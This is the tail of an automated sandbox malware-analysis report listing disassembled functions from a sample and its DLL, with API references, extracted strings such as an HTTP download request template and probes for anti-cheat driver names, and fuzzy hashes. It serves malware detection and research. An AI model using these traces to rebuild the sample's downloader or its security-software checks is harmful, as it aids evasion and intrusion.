                                                                                  • Instruction Fuzzy Hash: D601F778000601AFD228A7A3EC1EF5E37959F40B24F20455FF001962D2EF7CAC008A1D
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConvertDefaultLocale$H_prolog3__memset
                                                                                  • String ID: LI
                                                                                  • API String ID: 1819736550-1013918415
                                                                                  • Opcode ID: b83cb68975bc07a7a812a33b8d86cf74ac0d4755f618c33fd698cf90f188a470
                                                                                  • Instruction ID: 7f7864e48641a18839e182b0d86f02369cade75d530e69d4afd0a2a1a16cfde1
                                                                                  • Opcode Fuzzy Hash: b83cb68975bc07a7a812a33b8d86cf74ac0d4755f618c33fd698cf90f188a470
                                                                                  • Instruction Fuzzy Hash: 96516F71D002289FDB65EF659C41BEEB6B4AF59304F1041EBE548E2281DB788F81CF99
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 004123F0
                                                                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 0041244C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: i
                                                                                  • API String ID: 3850602802-3865851505
                                                                                  • Opcode ID: 2fbdc60ab4b9600b2aa02bb1565c8ce11bada0758e9cde3c4cb7f5c259964f47
                                                                                  • Instruction ID: 185ede2d8dc2f140b292045169d148bd715455c7714af3a1c12bdb094ea2a4cc
                                                                                  • Opcode Fuzzy Hash: 2fbdc60ab4b9600b2aa02bb1565c8ce11bada0758e9cde3c4cb7f5c259964f47
                                                                                  • Instruction Fuzzy Hash: 59514E70A00218DFDB68CB10DE4ABEA7BB5AB19305F1481AAE6045A3D1C7B85DD4CF99
                                                                                  APIs
                                                                                  • _sprintf.LIBCMT ref: 6A6E4CB6
                                                                                  • select.WS2_32 ref: 6A6E4D07
                                                                                  • send.WS2_32(?,?,00000000,00000000), ref: 6A6E4D22
                                                                                  • WSAGetLastError.WS2_32(?,00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 6A6E4D2C
                                                                                  Strings
                                                                                  • GET %s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: %sRange: bytes=%I64d-Connection: Keep-Alive, xrefs: 6A6E4CB0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_sprintfselectsend
                                                                                  • String ID: GET %s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: %sRange: bytes=%I64d-Connection: Keep-Alive
                                                                                  • API String ID: 1308779828-3218760813
                                                                                  • Opcode ID: 1db401b56da420cdd4b4dd5d863b54264790c561f9ae0da5a7910d1c1e9d6755
                                                                                  • Instruction ID: 93aa49c60a125c92b8fb324f2dcf15710e081a1828f6e87d79f307e4065bb8f3
                                                                                  • Opcode Fuzzy Hash: 1db401b56da420cdd4b4dd5d863b54264790c561f9ae0da5a7910d1c1e9d6755
                                                                                  • Instruction Fuzzy Hash: 56319F71609201AFD710DF78C98CA6BB7E6FB88308F05892CE849CB745EB75F9068B50
                                                                                  APIs
                                                                                  • _sprintf.LIBCMT ref: 6A6E4CB6
                                                                                  • select.WS2_32 ref: 6A6E4D07
                                                                                  • send.WS2_32(?,?,00000000,00000000), ref: 6A6E4D22
                                                                                  • WSAGetLastError.WS2_32(?,00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 6A6E4D2C
                                                                                  Strings
                                                                                  • GET %s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: %sRange: bytes=%I64d-Connection: Keep-Alive, xrefs: 6A6E4CB0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_sprintfselectsend
                                                                                  • String ID: GET %s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: %sRange: bytes=%I64d-Connection: Keep-Alive
                                                                                  • API String ID: 1308779828-3218760813
                                                                                  • Opcode ID: a3c54069fd4be207d446cf73779f22434df5488253038ed8f9c91bdf76d4ec31
                                                                                  • Instruction ID: 9c00bdb487ded9a9cd5c8f9e875faf038d9c342bc3ed3999593635a0fd730609
                                                                                  • Opcode Fuzzy Hash: a3c54069fd4be207d446cf73779f22434df5488253038ed8f9c91bdf76d4ec31
                                                                                  • Instruction Fuzzy Hash: 8B217C7160A241AFD314DFB4CD8CB6BB7E9BB88708F05492CE949D7241EF71E9028B65
                                                                                  APIs
                                                                                  • CoFreeUnusedLibraries.COMBASE(00000000,00000000,?,?,?,0044A6D3,000000FF,00000010,0044AAF1,00000000), ref: 00457024
                                                                                  • __msize.LIBCMT ref: 00457073
                                                                                  • __msize.LIBCMT ref: 00457096
                                                                                  • _malloc.LIBCMT ref: 004570AE
                                                                                  • _malloc.LIBCMT ref: 004570C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __msize_malloc$FreeLibrariesUnused
                                                                                  • String ID:
                                                                                  • API String ID: 553055863-0
                                                                                  • Opcode ID: 5cf0319063ac2db4c1eacb6239eb9efc1d463d41e4f8be98d34b6c172786a9fa
                                                                                  • Instruction ID: 370826939c363dca27f9f242faf4ee67a4340f065dd4b09cc218de279cbd1e03
                                                                                  • Opcode Fuzzy Hash: 5cf0319063ac2db4c1eacb6239eb9efc1d463d41e4f8be98d34b6c172786a9fa
                                                                                  • Instruction Fuzzy Hash: 9421B1315056119FCB25AF25E88195BB7E4AF00B26B11852FEC198B2C3DB3CDC99CB89
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0040D872
                                                                                  • _memset.LIBCMT ref: 0040D888
                                                                                  • _sprintf.LIBCMT ref: 0040D8A4
                                                                                    • Part of subcall function 0040D640: FindFirstFileA.KERNEL32(00000000,00000000,?,?,\*.*,?,?), ref: 0040D708
                                                                                  • _memset.LIBCMT ref: 0040D919
                                                                                  • _memset.LIBCMT ref: 0040D92F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$FileFindFirst_sprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1166468719-0
                                                                                  • Opcode ID: 5c690828c2d157d2d57bb139c269eeee58e3b1f83a3dcda2c676c0220d0cf474
                                                                                  • Instruction ID: 6fcc80fdc5726ca6fe2ab70ad81146eb755f0512fae0c0d83e8884a92cc2cc0e
                                                                                  • Opcode Fuzzy Hash: 5c690828c2d157d2d57bb139c269eeee58e3b1f83a3dcda2c676c0220d0cf474
                                                                                  • Instruction Fuzzy Hash: 222179F1D0021C67DB14EBA0DC47FDA73786B18708F4405ADB658662C2F6B59B88CBA6
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFileHandleWrite_memset_strlen_strncpy
                                                                                  • String ID:
                                                                                  • API String ID: 2611559564-0
                                                                                  • Opcode ID: 62c6ccba8791bda8e74f368045aec49a7a8a9d3cca83d1f58f96c388ea5a99b9
                                                                                  • Instruction ID: 1da1c8785b76fbbf931fbfdcf5da11d5436075a266fb121cab687a688915dfe6
                                                                                  • Opcode Fuzzy Hash: 62c6ccba8791bda8e74f368045aec49a7a8a9d3cca83d1f58f96c388ea5a99b9
                                                                                  • Instruction Fuzzy Hash: 06113DB5D00208EFDB04EF94D982BEEB379AF88308F104569E50577382E778AE44CB55
                                                                                  APIs
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0046FE47
                                                                                    • Part of subcall function 004784B0: __FindPESection.LIBCMT ref: 0047850B
                                                                                  • __freeptd.LIBCMT ref: 0046FE61
                                                                                  • RtlExitUserThread.NTDLL(?,?,?,0046FE92,00000000), ref: 0046FE6B
                                                                                  • __getptd.LIBCMT ref: 0046FE7D
                                                                                  • __XcptFilter.LIBCMT ref: 0046FE9E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentExitFilterFindImageNonwritableSectionThreadUserXcpt__freeptd__getptd
                                                                                  • String ID:
                                                                                  • API String ID: 2652032192-0
                                                                                  • Opcode ID: d45c327440b61b3d23720dff9c00b5c4d23028ea6ecc83f8bc426ab26b7d22b7
                                                                                  • Instruction ID: b575a882168ff1582fcdd1fbd5dfcde32446d1c8d3000bc3d3d2bfbd2fe7a219
                                                                                  • Opcode Fuzzy Hash: d45c327440b61b3d23720dff9c00b5c4d23028ea6ecc83f8bc426ab26b7d22b7
                                                                                  • Instruction Fuzzy Hash: CFF08675500605BFDB18B7A2E80DF6F3B65AB40758F10402FB545462A2EF7D9D44C929
                                                                                  APIs
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 6A6FDC55
                                                                                    • Part of subcall function 6A706D40: __FindPESection.LIBCMT ref: 6A706D9B
                                                                                  • __getptd_noexit.LIBCMT ref: 6A6FDC65
                                                                                  • CloseHandle.KERNEL32(?,?,6A6FDCB0), ref: 6A6FDC79
                                                                                  • __freeptd.LIBCMT ref: 6A6FDC80
                                                                                  • ExitThread.KERNEL32 ref: 6A6FDC88
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                   • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 3798957060-0
                                                                                  • Opcode ID: 19d5f3c073f5af7270c8ad3d47f349f281334218dfc46c85136eed8066c9f6af
                                                                                  • Instruction ID: a3b241056a6b3a01b0a406298669f0dfd3ecbacb112d21a3fc96fe4a7b0e6eaf
                                                                                  • Opcode Fuzzy Hash: 19d5f3c073f5af7270c8ad3d47f349f281334218dfc46c85136eed8066c9f6af
                                                                                  • Instruction Fuzzy Hash: ADE08671501A1197D6011BB1CA5D71E3ADD5F02629F564624E53AD60C4EFA0ED47CA60
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00440A60
                                                                                    • Part of subcall function 0043DEB0: _memset.LIBCMT ref: 0043DEC5
                                                                                    • Part of subcall function 0043DEB0: _malloc.LIBCMT ref: 0043DEE2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$_malloc
                                                                                  • String ID: L(D$L(D
                                                                                  • API String ID: 3506388080-578281039
                                                                                  • Opcode ID: 4f718b1c46b128c1664b92d3acf0f314b35a95a1eaa5fb7d09bff6526f5f001f
                                                                                  • Instruction ID: 21c6e696863d271599e25ea5ca70299bb0a7b37a32b05db971291e3e70fbc5ee
                                                                                  • Opcode Fuzzy Hash: 4f718b1c46b128c1664b92d3acf0f314b35a95a1eaa5fb7d09bff6526f5f001f
                                                                                  • Instruction Fuzzy Hash: 8E715EB1D00209DBEF24DF99DC81BDEB7B9AF44314F108299E618A7381E734AA94CF55
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 6A6F2DAB
                                                                                  • UrlUnescapeA.SHLWAPI(?,00000000,?,02000000,00000825,?,?,?,?,?,00000010,6A6E5EC0,?,00000001,00000001,00000000), ref: 6A6F2E44
                                                                                  • InternetOpenUrlA.WININET(?,?,?,?,?,00000001), ref: 6A6F2EBC
                                                                                    • Part of subcall function 6A6EE09C: _malloc.LIBCMT ref: 6A6EE0BA
                                                                                    • Part of subcall function 6A6F2CC9: __EH_prolog3.LIBCMT ref: 6A6F2CD0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                   • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3$InternetOpenUnescape_malloc
                                                                                  • String ID: GET
                                                                                  • API String ID: 2204432607-1805413626
                                                                                  • Opcode ID: aa6d29ba467106f96dfa8ae3e7c79eb99fa6643d555f42063fd56d38f7b8f4d9
                                                                                  • Instruction ID: 3ec69792133df554745a8caafd3820886b42583075326124d518fd9666988937
                                                                                  • Opcode Fuzzy Hash: aa6d29ba467106f96dfa8ae3e7c79eb99fa6643d555f42063fd56d38f7b8f4d9
                                                                                  • Instruction Fuzzy Hash: 2E51E27155428AABDF01CFB4C848AEE7BB6EF05304F114959F925A6291DF308A02CF61
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00434D9E
                                                                                  • select.WS2_32(?,?,00000000,00000000,00000000,00000003), ref: 00434E7F
                                                                                  • recv.WS2_32(?,?,00000000,00000001,00000000), ref: 00434EDF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memsetrecvselect
                                                                                  • String ID: @
                                                                                  • API String ID: 159336290-2766056989
                                                                                  • Opcode ID: d8cbad4057f2236b23156f1105cf5a4488466af88927e3c537b143150fce611e
                                                                                  • Instruction ID: 8639176ce9e2c90a1c902ce5fd2cad3ab3f0d4ca1ebb1ebca9a2f53658f1b4ef
                                                                                  • Opcode Fuzzy Hash: d8cbad4057f2236b23156f1105cf5a4488466af88927e3c537b143150fce611e
                                                                                  • Instruction Fuzzy Hash: 9D514C709006589FDF24CF48CC95BEEB7B5BB8930AF2090DAD51967240C778AE858F5A
                                                                                  APIs
                                                                                  • __wfopen_s.LIBCMT ref: 6A6E25F2
                                                                                  • OutputDebugStringA.KERNEL32(?,00000000,?,6A6E2A89,?), ref: 6A6E261C
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6E2623
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                   • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s
                                                                                  • String ID: C:\123.txt
                                                                                  • API String ID: 4089825709-757984348
                                                                                  • Opcode ID: e701be474b379bb5065d30ae5742dbe678e871a3dff29cc6167da405358e01e1
                                                                                  • Instruction ID: bf2988fdf1010627d1fdcd05f9d9c94cd6be5fbec2546b9f134351b3ecf54d9c
                                                                                  • Opcode Fuzzy Hash: e701be474b379bb5065d30ae5742dbe678e871a3dff29cc6167da405358e01e1
                                                                                  • Instruction Fuzzy Hash: BFE0D8B281E101B7DB1097B0DD40E9B77EA7B96610F05495EF24543240DE74DD08DBD2
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DBF00: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF26
                                                                                    • Part of subcall function 6A6DBF00: GetProcAddress.KERNEL32(00000000), ref: 6A6DBF2D
                                                                                  • CreateFileA.KERNELBASE(\\.\GpeNetSafe,00000000,00000003,00000000,00000003,00000080,00000000), ref: 6A6E1B66
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E1B72
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                   • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                   • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Handle$AddressCloseCreateFileModuleProc
                                                                                  • String ID: \\.\GameGuard$\\.\GpeNetSafe
                                                                                  • API String ID: 1058200188-3021087753
                                                                                  APIs
                                                                                  • __wfopen_s.LIBCMT ref: 6A6E25F2
                                                                                  • OutputDebugStringA.KERNEL32(?,00000000,?,6A6E2A89,?), ref: 6A6E261C
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6E2623
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s
                                                                                  • String ID: C:\123.txt
                                                                                  • API String ID: 4089825709-757984348
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen$_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1297213449-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fileno__flsbuf__flush__locking
                                                                                  • String ID:
                                                                                  • API String ID: 2259706978-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
